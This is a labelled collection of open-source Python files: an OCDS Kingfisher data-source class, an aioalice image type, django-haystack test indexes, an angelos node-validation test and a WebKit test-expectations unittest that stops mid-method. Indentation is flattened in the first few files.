from ocdskingfisher.sources.digiwhist_base import DigiwhistBaseSource
class DigiwhistGreeceRepublicSource(DigiwhistBaseSource):
publisher_name = 'Digiwhist Greece'
url = 'https://opentender.eu/download'
source_id = 'digiwhist_greece'
def get_data_url(self):
return 'https://opentender.eu/data/files/GR_ocds_data.json.tar.gz'
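# The class above follows a simple registry pattern: each source subclasses
# DigiwhistBaseSource, overrides a few class attributes, and implements
# get_data_url(). A self-contained sketch of that pattern — BaseSource here is
# a hypothetical stand-in, not the real DigiwhistBaseSource:

```python
class BaseSource:
    """Hypothetical stand-in for DigiwhistBaseSource."""
    publisher_name = None
    url = None
    source_id = None

    def get_data_url(self):
        raise NotImplementedError

class DigiwhistGreeceRepublicSource(BaseSource):
    publisher_name = 'Digiwhist Greece'
    url = 'https://opentender.eu/download'
    source_id = 'digiwhist_greece'

    def get_data_url(self):
        return 'https://opentender.eu/data/files/GR_ocds_data.json.tar.gz'

source = DigiwhistGreeceRepublicSource()
```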

# File: aioalice/types/uploaded_image.py | repo: mahenzon/aioalice | license: MIT

from attr import attrs, attrib
from aioalice.types import AliceObject
@attrs
class UploadedImage(AliceObject):
"""This object represents an uploaded image"""
id = attrib(type=str)
origUrl = attrib(default=None, type=str)
# origUrl will be None if image was uploaded from bytes, not by url
@property
def orig_url(self):
return self.origUrl

# File: test_haystack/discovery/search_indexes.py | repo: lvelezsantos/django-haystack | license: BSD-3-Clause

# encoding: utf-8
from test_haystack.discovery.models import Bar, Foo
from haystack import indexes
class FooIndex(indexes.SearchIndex, indexes.Indexable):
text = indexes.CharField(document=True, model_attr="body")
def get_model(self):
return Foo
class BarIndex(indexes.SearchIndex, indexes.Indexable):
text = indexes.CharField(document=True)
def get_model(self):
return Bar

# File: angelos-portfolio/test/test_node_validate.py | repo: kristoffer-paulsson/angelos | license: MIT

#
# Copyright (c) 2018-2020 by Kristoffer Paulsson <kristoffer.paulsson@talenten.se>.
#
# This software is available under the terms of the MIT license. Parts are licensed under
# different terms if stated. The legal terms are attached to the LICENSE file and are
# made available on:
#
# https://opensource.org/licenses/MIT
#
# SPDX-License-Identifier: MIT
#
# Contributors:
# Kristoffer Paulsson - initial implementation
#
"""Security tests putting the policies to the test."""
from unittest import TestCase
from angelos.common.policy import evaluate
from angelos.lib.policy.types import PersonData
from angelos.portfolio.domain.create import CreateDomain
from angelos.portfolio.entity.create import CreatePersonEntity
from angelos.portfolio.node.create import CreateNode
from angelos.portfolio.node.validate import ValidateNode
from test.fixture.generate import Generate
class TestValidateNode(TestCase):
def test_perform(self):
data = PersonData(**Generate.person_data()[0])
portfolio = CreatePersonEntity().perform(data)
CreateDomain().perform(portfolio)
node = CreateNode().current(portfolio, server=True)
self.assertIn(node, portfolio.nodes)
with evaluate("Node:Validate") as report:
ValidateNode().validate(portfolio, node)
self.assertIn(node, portfolio.nodes)
        self.assertTrue(report)

# File: third_party/WebKit/Tools/Scripts/webkitpy/layout_tests/models/test_expectations_unittest.py | repo: wenfeifei/miniblink49 | license: Apache-2.0

# Copyright (C) 2010 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import unittest
from webkitpy.common.host_mock import MockHost
from webkitpy.common.system.outputcapture import OutputCapture
from webkitpy.layout_tests.models.test_configuration import *
from webkitpy.layout_tests.models.test_expectations import *
try:
from collections import OrderedDict
except ImportError:
# Needed for Python < 2.7
from webkitpy.thirdparty.ordered_dict import OrderedDict


class Base(unittest.TestCase):
    # Note that all of these tests are written assuming the configuration
    # being tested is Windows XP, Release build.

    def __init__(self, testFunc):
        host = MockHost()
        self._port = host.port_factory.get('test-win-xp', None)
        self._exp = None
        unittest.TestCase.__init__(self, testFunc)

    def get_basic_tests(self):
        return ['failures/expected/text.html',
                'failures/expected/image_checksum.html',
                'failures/expected/crash.html',
                'failures/expected/needsrebaseline.html',
                'failures/expected/needsmanualrebaseline.html',
                'failures/expected/missing_text.html',
                'failures/expected/image.html',
                'failures/expected/timeout.html',
                'passes/text.html']

    def get_basic_expectations(self):
        return """
Bug(test) failures/expected/text.html [ Failure ]
Bug(test) failures/expected/crash.html [ WontFix ]
Bug(test) failures/expected/needsrebaseline.html [ NeedsRebaseline ]
Bug(test) failures/expected/needsmanualrebaseline.html [ NeedsManualRebaseline ]
Bug(test) failures/expected/missing_image.html [ Rebaseline Missing ]
Bug(test) failures/expected/image_checksum.html [ WontFix ]
Bug(test) failures/expected/image.html [ WontFix Mac ]
"""

    def parse_exp(self, expectations, overrides=None, is_lint_mode=False):
        expectations_dict = OrderedDict()
        expectations_dict['expectations'] = expectations
        if overrides:
            expectations_dict['overrides'] = overrides
        self._port.expectations_dict = lambda: expectations_dict
        expectations_to_lint = expectations_dict if is_lint_mode else None
        self._exp = TestExpectations(self._port, self.get_basic_tests(), expectations_dict=expectations_to_lint, is_lint_mode=is_lint_mode)

    def assert_exp_list(self, test, results):
        self.assertEqual(self._exp.get_expectations(test), set(results))

    def assert_exp(self, test, result):
        self.assert_exp_list(test, [result])

    def assert_bad_expectations(self, expectations, overrides=None):
        self.assertRaises(ParseError, self.parse_exp, expectations, is_lint_mode=True, overrides=overrides)


class BasicTests(Base):
    def test_basic(self):
        self.parse_exp(self.get_basic_expectations())
        self.assert_exp('failures/expected/text.html', FAIL)
        self.assert_exp_list('failures/expected/image_checksum.html', [WONTFIX, SKIP])
        self.assert_exp('passes/text.html', PASS)
        self.assert_exp('failures/expected/image.html', PASS)


class MiscTests(Base):
    def test_multiple_results(self):
        self.parse_exp('Bug(x) failures/expected/text.html [ Crash Failure ]')
        self.assertEqual(self._exp.get_expectations('failures/expected/text.html'), set([FAIL, CRASH]))

    def test_result_was_expected(self):
        # test basics
        self.assertEqual(TestExpectations.result_was_expected(PASS, set([PASS]), test_needs_rebaselining=False), True)
        self.assertEqual(TestExpectations.result_was_expected(FAIL, set([PASS]), test_needs_rebaselining=False), False)

        # test handling of SKIPped tests and results
        self.assertEqual(TestExpectations.result_was_expected(SKIP, set([CRASH]), test_needs_rebaselining=False), True)
        self.assertEqual(TestExpectations.result_was_expected(SKIP, set([LEAK]), test_needs_rebaselining=False), True)

        # test handling of MISSING results and the REBASELINE specifier
        self.assertEqual(TestExpectations.result_was_expected(MISSING, set([PASS]), test_needs_rebaselining=True), True)
        self.assertEqual(TestExpectations.result_was_expected(MISSING, set([PASS]), test_needs_rebaselining=False), False)

        self.assertTrue(TestExpectations.result_was_expected(PASS, set([NEEDS_REBASELINE]), test_needs_rebaselining=False))
        self.assertTrue(TestExpectations.result_was_expected(MISSING, set([NEEDS_REBASELINE]), test_needs_rebaselining=False))
        self.assertTrue(TestExpectations.result_was_expected(TEXT, set([NEEDS_REBASELINE]), test_needs_rebaselining=False))
        self.assertTrue(TestExpectations.result_was_expected(IMAGE, set([NEEDS_REBASELINE]), test_needs_rebaselining=False))
        self.assertTrue(TestExpectations.result_was_expected(IMAGE_PLUS_TEXT, set([NEEDS_REBASELINE]), test_needs_rebaselining=False))
        self.assertTrue(TestExpectations.result_was_expected(AUDIO, set([NEEDS_REBASELINE]), test_needs_rebaselining=False))
        self.assertFalse(TestExpectations.result_was_expected(TIMEOUT, set([NEEDS_REBASELINE]), test_needs_rebaselining=False))
        self.assertFalse(TestExpectations.result_was_expected(CRASH, set([NEEDS_REBASELINE]), test_needs_rebaselining=False))
        self.assertFalse(TestExpectations.result_was_expected(LEAK, set([NEEDS_REBASELINE]), test_needs_rebaselining=False))

    def test_remove_pixel_failures(self):
        self.assertEqual(TestExpectations.remove_pixel_failures(set([FAIL])), set([FAIL]))
        self.assertEqual(TestExpectations.remove_pixel_failures(set([PASS])), set([PASS]))
        self.assertEqual(TestExpectations.remove_pixel_failures(set([IMAGE])), set([PASS]))
        self.assertEqual(TestExpectations.remove_pixel_failures(set([FAIL])), set([FAIL]))
        self.assertEqual(TestExpectations.remove_pixel_failures(set([PASS, IMAGE, CRASH])), set([PASS, CRASH]))

    def test_suffixes_for_expectations(self):
        self.assertEqual(TestExpectations.suffixes_for_expectations(set([FAIL])), set(['txt', 'png', 'wav']))
        self.assertEqual(TestExpectations.suffixes_for_expectations(set([IMAGE])), set(['png']))
        self.assertEqual(TestExpectations.suffixes_for_expectations(set([FAIL, IMAGE, CRASH])), set(['txt', 'png', 'wav']))
        self.assertEqual(TestExpectations.suffixes_for_expectations(set()), set())
    def test_category_expectations(self):
        # This test checks that unknown tests are not present in the
        # expectations and that a known test that is part of a test
        # category is present in the expectations.
        exp_str = 'Bug(x) failures/expected [ WontFix ]'
        self.parse_exp(exp_str)
        unknown_test = 'failures/expected/unknown-test.html'
        self.assertRaises(KeyError, self._exp.get_expectations, unknown_test)
        self.assert_exp_list('failures/expected/crash.html', [WONTFIX, SKIP])

    def test_get_expectations_string(self):
        self.parse_exp(self.get_basic_expectations())
        self.assertEqual(self._exp.get_expectations_string('failures/expected/text.html'), 'FAIL')

    def test_expectation_to_string(self):
        # Normal cases are handled by other tests.
        self.parse_exp(self.get_basic_expectations())
        self.assertRaises(ValueError, self._exp.expectation_to_string, -1)

    def test_get_test_set(self):
        # Handle some corner cases for this routine not covered by other tests.
        self.parse_exp(self.get_basic_expectations())
        s = self._exp.get_test_set(WONTFIX)
        self.assertEqual(s, set(['failures/expected/crash.html', 'failures/expected/image_checksum.html']))
    def test_needs_rebaseline_reftest(self):
        try:
            filesystem = self._port.host.filesystem
            filesystem.write_text_file(filesystem.join(self._port.layout_tests_dir(), 'failures/expected/needsrebaseline.html'), 'content')
            filesystem.write_text_file(filesystem.join(self._port.layout_tests_dir(), 'failures/expected/needsrebaseline-expected.html'), 'content')
            filesystem.write_text_file(filesystem.join(self._port.layout_tests_dir(), 'failures/expected/needsmanualrebaseline.html'), 'content')
            filesystem.write_text_file(filesystem.join(self._port.layout_tests_dir(), 'failures/expected/needsmanualrebaseline-expected.html'), 'content')
            self.parse_exp("""Bug(user) failures/expected/needsrebaseline.html [ NeedsRebaseline ]
Bug(user) failures/expected/needsmanualrebaseline.html [ NeedsManualRebaseline ]""", is_lint_mode=True)
            self.fail("ParseError wasn't raised")
        except ParseError as e:
            warnings = """expectations:1 A reftest cannot be marked as NeedsRebaseline/NeedsManualRebaseline failures/expected/needsrebaseline.html
expectations:2 A reftest cannot be marked as NeedsRebaseline/NeedsManualRebaseline failures/expected/needsmanualrebaseline.html"""
            self.assertEqual(str(e), warnings)
    def test_parse_warning(self):
        try:
            filesystem = self._port.host.filesystem
            filesystem.write_text_file(filesystem.join(self._port.layout_tests_dir(), 'disabled-test.html-disabled'), 'content')
            filesystem.write_text_file(filesystem.join(self._port.layout_tests_dir(), 'test-to-rebaseline.html'), 'content')
            self.parse_exp("Bug(user) [ FOO ] failures/expected/text.html [ Failure ]\n"
                           "Bug(user) non-existent-test.html [ Failure ]\n"
                           "Bug(user) disabled-test.html-disabled [ ImageOnlyFailure ]\n"
                           "Bug(user) [ Release ] test-to-rebaseline.html [ NeedsRebaseline ]", is_lint_mode=True)
            self.fail("ParseError wasn't raised")
        except ParseError as e:
            warnings = ("expectations:1 Unrecognized specifier 'foo' failures/expected/text.html\n"
                        "expectations:2 Path does not exist. non-existent-test.html\n"
                        "expectations:4 A test cannot be rebaselined for Debug/Release. test-to-rebaseline.html")
            self.assertEqual(str(e), warnings)
    def test_parse_warnings_are_logged_if_not_in_lint_mode(self):
        oc = OutputCapture()
        try:
            oc.capture_output()
            self.parse_exp('-- this should be a syntax error', is_lint_mode=False)
        finally:
            _, _, logs = oc.restore_output()
            self.assertNotEqual(logs, '')
    def test_error_on_different_platform(self):
        # parse_exp uses a Windows port. Assert errors on Mac show up in lint mode.
        self.assertRaises(ParseError, self.parse_exp,
                          'Bug(test) [ Mac ] failures/expected/text.html [ Failure ]\nBug(test) [ Mac ] failures/expected/text.html [ Failure ]',
                          is_lint_mode=True)

    def test_error_on_different_build_type(self):
        # parse_exp uses a Release port. Assert errors on DEBUG show up in lint mode.
        self.assertRaises(ParseError, self.parse_exp,
                          'Bug(test) [ Debug ] failures/expected/text.html [ Failure ]\nBug(test) [ Debug ] failures/expected/text.html [ Failure ]',
                          is_lint_mode=True)

    def test_overrides(self):
        self.parse_exp("Bug(exp) failures/expected/text.html [ Failure ]",
                       "Bug(override) failures/expected/text.html [ ImageOnlyFailure ]")
        self.assert_exp_list('failures/expected/text.html', [FAIL, IMAGE])

    def test_overrides__directory(self):
        self.parse_exp("Bug(exp) failures/expected/text.html [ Failure ]",
                       "Bug(override) failures/expected [ Crash ]")
        self.assert_exp_list('failures/expected/text.html', [FAIL, CRASH])
        self.assert_exp_list('failures/expected/image.html', [CRASH])

    def test_overrides__duplicate(self):
        self.assert_bad_expectations("Bug(exp) failures/expected/text.html [ Failure ]",
                                     "Bug(override) failures/expected/text.html [ ImageOnlyFailure ]\n"
                                     "Bug(override) failures/expected/text.html [ Crash ]\n")

    def test_pixel_tests_flag(self):
        def match(test, result, pixel_tests_enabled):
            return self._exp.matches_an_expected_result(
                test, result, pixel_tests_enabled, sanitizer_is_enabled=False)

        self.parse_exp(self.get_basic_expectations())
        self.assertTrue(match('failures/expected/text.html', FAIL, True))
        self.assertTrue(match('failures/expected/text.html', FAIL, False))
        self.assertFalse(match('failures/expected/text.html', CRASH, True))
        self.assertFalse(match('failures/expected/text.html', CRASH, False))
        self.assertTrue(match('failures/expected/image_checksum.html', PASS, True))
        self.assertTrue(match('failures/expected/image_checksum.html', PASS, False))
        self.assertTrue(match('failures/expected/crash.html', PASS, False))
        self.assertTrue(match('failures/expected/needsrebaseline.html', TEXT, True))
        self.assertFalse(match('failures/expected/needsrebaseline.html', CRASH, True))
        self.assertTrue(match('failures/expected/needsmanualrebaseline.html', TEXT, True))
        self.assertFalse(match('failures/expected/needsmanualrebaseline.html', CRASH, True))
        self.assertTrue(match('passes/text.html', PASS, False))

    def test_sanitizer_flag(self):
        def match(test, result):
            return self._exp.matches_an_expected_result(
                test, result, pixel_tests_are_enabled=False, sanitizer_is_enabled=True)

        self.parse_exp("""
Bug(test) failures/expected/crash.html [ Crash ]
Bug(test) failures/expected/image.html [ ImageOnlyFailure ]
Bug(test) failures/expected/text.html [ Failure ]
Bug(test) failures/expected/timeout.html [ Timeout ]
""")
        self.assertTrue(match('failures/expected/crash.html', CRASH))
        self.assertTrue(match('failures/expected/image.html', PASS))
        self.assertTrue(match('failures/expected/text.html', PASS))
        self.assertTrue(match('failures/expected/timeout.html', TIMEOUT))

    def test_more_specific_override_resets_skip(self):
        self.parse_exp("Bug(x) failures/expected [ Skip ]\n"
                       "Bug(x) failures/expected/text.html [ ImageOnlyFailure ]\n")
        self.assert_exp('failures/expected/text.html', IMAGE)
        self.assertFalse(self._port._filesystem.join(self._port.layout_tests_dir(),
                                                     'failures/expected/text.html') in
                         self._exp.get_tests_with_result_type(SKIP))

    def test_bot_test_expectations(self):
        """Test that expectations are merged rather than overridden when using flaky option 'unexpected'."""
        test_name1 = 'failures/expected/text.html'
        test_name2 = 'passes/text.html'

        expectations_dict = OrderedDict()
        expectations_dict['expectations'] = "Bug(x) %s [ ImageOnlyFailure ]\nBug(x) %s [ Slow ]\n" % (test_name1, test_name2)
        self._port.expectations_dict = lambda: expectations_dict

        expectations = TestExpectations(self._port, self.get_basic_tests())
        self.assertEqual(expectations.get_expectations(test_name1), set([IMAGE]))
        self.assertEqual(expectations.get_expectations(test_name2), set([SLOW]))

        def bot_expectations():
            return {test_name1: ['PASS', 'TIMEOUT'], test_name2: ['CRASH']}
        self._port.bot_expectations = bot_expectations
        self._port._options.ignore_flaky_tests = 'unexpected'

        expectations = TestExpectations(self._port, self.get_basic_tests())
        self.assertEqual(expectations.get_expectations(test_name1), set([PASS, IMAGE, TIMEOUT]))
        self.assertEqual(expectations.get_expectations(test_name2), set([CRASH, SLOW]))


class SkippedTests(Base):
    def check(self, expectations, overrides, skips, lint=False, expected_results=[WONTFIX, SKIP, FAIL]):
        port = MockHost().port_factory.get('test-win-xp')
        port._filesystem.write_text_file(port._filesystem.join(port.layout_tests_dir(), 'failures/expected/text.html'), 'foo')
        expectations_dict = OrderedDict()
        expectations_dict['expectations'] = expectations
        if overrides:
            expectations_dict['overrides'] = overrides
        port.expectations_dict = lambda: expectations_dict
        port.skipped_layout_tests = lambda tests: set(skips)
        expectations_to_lint = expectations_dict if lint else None
        exp = TestExpectations(port, ['failures/expected/text.html'], expectations_dict=expectations_to_lint, is_lint_mode=lint)
        self.assertEqual(exp.get_expectations('failures/expected/text.html'), set(expected_results))

    def test_skipped_tests_work(self):
        self.check(expectations='', overrides=None, skips=['failures/expected/text.html'], expected_results=[WONTFIX, SKIP])

    def test_duplicate_skipped_test_fails_lint(self):
        self.assertRaises(ParseError, self.check, expectations='Bug(x) failures/expected/text.html [ Failure ]\n',
                          overrides=None, skips=['failures/expected/text.html'], lint=True)

    def test_skipped_file_overrides_expectations(self):
        self.check(expectations='Bug(x) failures/expected/text.html [ Failure ]\n', overrides=None,
                   skips=['failures/expected/text.html'])

    def test_skipped_dir_overrides_expectations(self):
        self.check(expectations='Bug(x) failures/expected/text.html [ Failure ]\n', overrides=None,
                   skips=['failures/expected'])

    def test_skipped_file_overrides_overrides(self):
        self.check(expectations='', overrides='Bug(x) failures/expected/text.html [ Failure ]\n',
                   skips=['failures/expected/text.html'])

    def test_skipped_dir_overrides_overrides(self):
        self.check(expectations='', overrides='Bug(x) failures/expected/text.html [ Failure ]\n',
                   skips=['failures/expected'])

    def test_skipped_entry_dont_exist(self):
        port = MockHost().port_factory.get('test-win-xp')
        expectations_dict = OrderedDict()
        expectations_dict['expectations'] = ''
        port.expectations_dict = lambda: expectations_dict
        port.skipped_layout_tests = lambda tests: set(['foo/bar/baz.html'])
        capture = OutputCapture()
        capture.capture_output()
        exp = TestExpectations(port)
        _, _, logs = capture.restore_output()
        self.assertEqual('The following test foo/bar/baz.html from the Skipped list doesn\'t exist\n', logs)

    def test_expectations_string(self):
        self.parse_exp(self.get_basic_expectations())
        notrun = 'failures/expected/text.html'
        self._exp.add_extra_skipped_tests([notrun])
        self.assertEqual('NOTRUN', self._exp.get_expectations_string(notrun))


class ExpectationSyntaxTests(Base):
    def test_unrecognized_expectation(self):
        self.assert_bad_expectations('Bug(test) failures/expected/text.html [ Unknown ]')

    def test_macro(self):
        exp_str = 'Bug(test) [ Win ] failures/expected/text.html [ Failure ]'
        self.parse_exp(exp_str)
        self.assert_exp('failures/expected/text.html', FAIL)

    def assert_tokenize_exp(self, line, bugs=None, specifiers=None, expectations=None, warnings=None, comment=None, name='foo.html'):
        bugs = bugs or []
        specifiers = specifiers or []
        expectations = expectations or []
        warnings = warnings or []
        filename = 'TestExpectations'
        line_number = '1'
        expectation_line = TestExpectationParser._tokenize_line(filename, line, line_number)
        self.assertEqual(expectation_line.warnings, warnings)
        self.assertEqual(expectation_line.name, name)
        self.assertEqual(expectation_line.filename, filename)
        self.assertEqual(expectation_line.line_numbers, line_number)
        if not warnings:
            self.assertEqual(expectation_line.specifiers, specifiers)
            self.assertEqual(expectation_line.expectations, expectations)

    def test_comments(self):
        self.assert_tokenize_exp("# comment", name=None, comment="# comment")
        self.assert_tokenize_exp("foo.html [ Pass ] # comment", comment="# comment", expectations=['PASS'], specifiers=[])

    def test_config_specifiers(self):
        self.assert_tokenize_exp('[ Mac ] foo.html [ Failure ] ', specifiers=['MAC'], expectations=['FAIL'])

    def test_unknown_config(self):
        self.assert_tokenize_exp('[ Foo ] foo.html [ Pass ]', specifiers=['Foo'], expectations=['PASS'])

    def test_unknown_expectation(self):
        self.assert_tokenize_exp('foo.html [ Audio ]', warnings=['Unrecognized expectation "Audio"'])

    def test_skip(self):
        self.assert_tokenize_exp('foo.html [ Skip ]', specifiers=[], expectations=['SKIP'])

    def test_slow(self):
        self.assert_tokenize_exp('foo.html [ Slow ]', specifiers=[], expectations=['SLOW'])

    def test_wontfix(self):
        self.assert_tokenize_exp('foo.html [ WontFix ]', specifiers=[], expectations=['WONTFIX', 'SKIP'])
        self.assert_tokenize_exp('foo.html [ WontFix ImageOnlyFailure ]', specifiers=[], expectations=['WONTFIX', 'SKIP'],
                                 warnings=['A test marked Skip or WontFix must not have other expectations.'])

    def test_blank_line(self):
        self.assert_tokenize_exp('', name=None)

    def test_warnings(self):
        self.assert_tokenize_exp('[ Mac ]', warnings=['Did not find a test name.', 'Missing expectations.'], name=None)
        self.assert_tokenize_exp('[ [', warnings=['unexpected "["', 'Missing expectations.'], name=None)
        self.assert_tokenize_exp('crbug.com/12345 ]', warnings=['unexpected "]"', 'Missing expectations.'], name=None)
        self.assert_tokenize_exp('foo.html crbug.com/12345 ]', warnings=['"crbug.com/12345" is not at the start of the line.', 'Missing expectations.'])
        self.assert_tokenize_exp('foo.html', warnings=['Missing expectations.'])


class SemanticTests(Base):
    def test_bug_format(self):
        self.assertRaises(ParseError, self.parse_exp, 'BUG1234 failures/expected/text.html [ Failure ]', is_lint_mode=True)

    def test_bad_bugid(self):
        try:
            self.parse_exp('crbug/1234 failures/expected/text.html [ Failure ]', is_lint_mode=True)
            self.fail('should have raised an error about a bad bug identifier')
        except ParseError as exp:
            self.assertEqual(len(exp.warnings), 3)

    def test_missing_bugid(self):
        self.parse_exp('failures/expected/text.html [ Failure ]', is_lint_mode=False)
        self.assertFalse(self._exp.has_warnings())

        try:
            self.parse_exp('failures/expected/text.html [ Failure ]', is_lint_mode=True)
        except ParseError as exp:
            self.assertEqual(exp.warnings, ['expectations:1 Test lacks BUG specifier. failures/expected/text.html'])
    def test_skip_and_wontfix(self):
        # Skip is not allowed to have other expectations as well, because those
        # expectations won't be exercised and may become stale.
        self.parse_exp('failures/expected/text.html [ Failure Skip ]')
        self.assertTrue(self._exp.has_warnings())

        self.parse_exp('failures/expected/text.html [ Crash WontFix ]')
        self.assertTrue(self._exp.has_warnings())

        self.parse_exp('failures/expected/text.html [ Pass WontFix ]')
        self.assertTrue(self._exp.has_warnings())

    def test_rebaseline(self):
        # Can't lint a file w/ 'REBASELINE' in it.
        self.assertRaises(ParseError, self.parse_exp,
                          'Bug(test) failures/expected/text.html [ Failure Rebaseline ]',
                          is_lint_mode=True)

    def test_duplicates(self):
        self.assertRaises(ParseError, self.parse_exp, """
Bug(exp) failures/expected/text.html [ Failure ]
Bug(exp) failures/expected/text.html [ ImageOnlyFailure ]""", is_lint_mode=True)

        self.assertRaises(ParseError, self.parse_exp,
                          self.get_basic_expectations(), overrides="""
Bug(override) failures/expected/text.html [ Failure ]
Bug(override) failures/expected/text.html [ ImageOnlyFailure ]""", is_lint_mode=True)

    def test_duplicate_with_line_before_preceding_line(self):
        self.assert_bad_expectations("""Bug(exp) [ Debug ] failures/expected/text.html [ Failure ]
Bug(exp) [ Release ] failures/expected/text.html [ Failure ]
Bug(exp) [ Debug ] failures/expected/text.html [ Failure ]
""")

    def test_missing_file(self):
        self.parse_exp('Bug(test) missing_file.html [ Failure ]')
        self.assertTrue(self._exp.has_warnings())


class PrecedenceTests(Base):
    def test_file_over_directory(self):
        # This tests handling precedence of specific lines over directories
        # and tests expectations covering entire directories.
        exp_str = """
Bug(x) failures/expected/text.html [ Failure ]
Bug(y) failures/expected [ WontFix ]
"""
        self.parse_exp(exp_str)
        self.assert_exp('failures/expected/text.html', FAIL)
        self.assert_exp_list('failures/expected/crash.html', [WONTFIX, SKIP])

        exp_str = """
Bug(x) failures/expected [ WontFix ]
Bug(y) failures/expected/text.html [ Failure ]
"""
        self.parse_exp(exp_str)
        self.assert_exp('failures/expected/text.html', FAIL)
        self.assert_exp_list('failures/expected/crash.html', [WONTFIX, SKIP])

    def test_ambiguous(self):
        self.assert_bad_expectations("Bug(test) [ Release ] passes/text.html [ Pass ]\n"
                                     "Bug(test) [ Win ] passes/text.html [ Failure ]\n")

    def test_more_specifiers(self):
        self.assert_bad_expectations("Bug(test) [ Release ] passes/text.html [ Pass ]\n"
                                     "Bug(test) [ Win Release ] passes/text.html [ Failure ]\n")

    def test_order_in_file(self):
        self.assert_bad_expectations("Bug(test) [ Win Release ] : passes/text.html [ Failure ]\n"
                                     "Bug(test) [ Release ] : passes/text.html [ Pass ]\n")

    def test_macro_overrides(self):
        self.assert_bad_expectations("Bug(test) [ Win ] passes/text.html [ Pass ]\n"
                                     "Bug(test) [ XP ] passes/text.html [ Failure ]\n")


class RemoveConfigurationsTest(Base):
    def test_remove(self):
        host = MockHost()
        test_port = host.port_factory.get('test-win-xp', None)
        test_port.test_exists = lambda test: True
        test_port.test_isfile = lambda test: True

        test_config = test_port.test_configuration()
        test_port.expectations_dict = lambda: {"expectations": """Bug(x) [ Linux Win Release ] failures/expected/foo.html [ Failure ]
Bug(y) [ Win Mac Debug ] failures/expected/foo.html [ Crash ]
"""}
        expectations = TestExpectations(test_port, self.get_basic_tests())

        actual_expectations = expectations.remove_configurations([('failures/expected/foo.html', test_config)])

        self.assertEqual("""Bug(x) [ Linux Win7 Release ] failures/expected/foo.html [ Failure ]
Bug(y) [ Win Mac Debug ] failures/expected/foo.html [ Crash ]
""", actual_expectations)

    def test_remove_needs_rebaseline(self):
        host = MockHost()
        test_port = host.port_factory.get('test-win-xp', None)
        test_port.test_exists = lambda test: True
        test_port.test_isfile = lambda test: True

        test_config = test_port.test_configuration()
        test_port.expectations_dict = lambda: {"expectations": """Bug(x) [ Win ] failures/expected/foo.html [ NeedsRebaseline ]
"""}
        expectations = TestExpectations(test_port, self.get_basic_tests())

        actual_expectations = expectations.remove_configurations([('failures/expected/foo.html', test_config)])

        self.assertEqual("""Bug(x) [ XP Debug ] failures/expected/foo.html [ NeedsRebaseline ]
Bug(x) [ Win7 ] failures/expected/foo.html [ NeedsRebaseline ]
""", actual_expectations)

    def test_remove_multiple_configurations(self):
        host = MockHost()
        test_port = host.port_factory.get('test-win-xp', None)
        test_port.test_exists = lambda test: True
        test_port.test_isfile = lambda test: True

        test_config = test_port.test_configuration()
        test_port.expectations_dict = lambda: {'expectations': """Bug(y) [ Win Debug ] failures/expected/foo.html [ Crash ]
Bug(x) [ Win Release ] failures/expected/foo.html [ Failure ]
"""}
        expectations = TestExpectations(test_port)

        actual_expectations = expectations.remove_configurations([
            ('failures/expected/foo.html', test_config),
            ('failures/expected/foo.html', host.port_factory.get('test-win-win7', None).test_configuration()),
        ])

        self.assertEqual("""Bug(y) [ Win Debug ] failures/expected/foo.html [ Crash ]
""", actual_expectations)
    def test_remove_line_with_comments(self):
        host = MockHost()
        test_port = host.port_factory.get('test-win-xp', None)
        test_port.test_exists = lambda test: True
        test_port.test_isfile = lambda test: True

        test_config = test_port.test_configuration()
        test_port.expectations_dict = lambda: {'expectations': """Bug(y) [ Win Debug ] failures/expected/foo.html [ Crash ]

 # This comment line should get stripped. As should the preceding line.
Bug(x) [ Win Release ] failures/expected/foo.html [ Failure ]
"""}
        expectations = TestExpectations(test_port)

        actual_expectations = expectations.remove_configurations([('failures/expected/foo.html', test_config)])
        actual_expectations = expectations.remove_configurations([('failures/expected/foo.html', host.port_factory.get('test-win-win7', None).test_configuration())])

        self.assertEqual("""Bug(y) [ Win Debug ] failures/expected/foo.html [ Crash ]
""", actual_expectations)

    def test_remove_line_with_comments_at_start(self):
        host = MockHost()
        test_port = host.port_factory.get('test-win-xp', None)
        test_port.test_exists = lambda test: True
        test_port.test_isfile = lambda test: True

        test_config = test_port.test_configuration()
        test_port.expectations_dict = lambda: {'expectations': """

 # This comment line should get stripped. As should the preceding line.
Bug(x) [ Win Release ] failures/expected/foo.html [ Failure ]
Bug(y) [ Win Debug ] failures/expected/foo.html [ Crash ]
"""}
        expectations = TestExpectations(test_port)

        actual_expectations = expectations.remove_configurations([('failures/expected/foo.html', test_config)])
        actual_expectations = expectations.remove_configurations([('failures/expected/foo.html', host.port_factory.get('test-win-win7', None).test_configuration())])

        self.assertEqual("""
Bug(y) [ Win Debug ] failures/expected/foo.html [ Crash ]
""", actual_expectations)

    def test_remove_line_with_comments_at_end_with_no_trailing_newline(self):
        host = MockHost()
        test_port = host.port_factory.get('test-win-xp', None)
        test_port.test_exists = lambda test: True
        test_port.test_isfile = lambda test: True

        test_config = test_port.test_configuration()
        test_port.expectations_dict = lambda: {'expectations': """Bug(y) [ Win Debug ] failures/expected/foo.html [ Crash ]

 # This comment line should get stripped. As should the preceding line.
Bug(x) [ Win Release ] failures/expected/foo.html [ Failure ]"""}
